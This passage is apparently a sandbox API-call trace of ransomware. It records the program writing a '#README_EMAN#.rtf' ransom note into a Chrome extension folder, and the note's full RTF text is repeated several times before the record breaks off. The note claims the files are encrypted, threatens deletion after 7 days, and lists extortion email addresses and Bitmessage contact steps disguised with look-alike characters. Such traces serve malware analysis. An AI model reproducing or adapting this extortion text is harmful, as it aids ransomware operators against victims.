(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.273] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.274] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.274] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm 